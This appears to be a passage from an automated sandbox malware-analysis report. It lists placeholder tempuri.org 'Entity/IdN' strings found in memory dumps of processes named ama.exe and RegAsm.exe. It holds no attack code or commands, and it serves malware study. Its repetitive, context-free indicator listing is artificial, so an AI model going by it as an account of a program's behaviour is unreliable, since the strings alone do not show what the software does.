Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: ama.exe, 00000004.00000002.2393678580.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: ama.exe, 00000004.00000002.2393678580.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
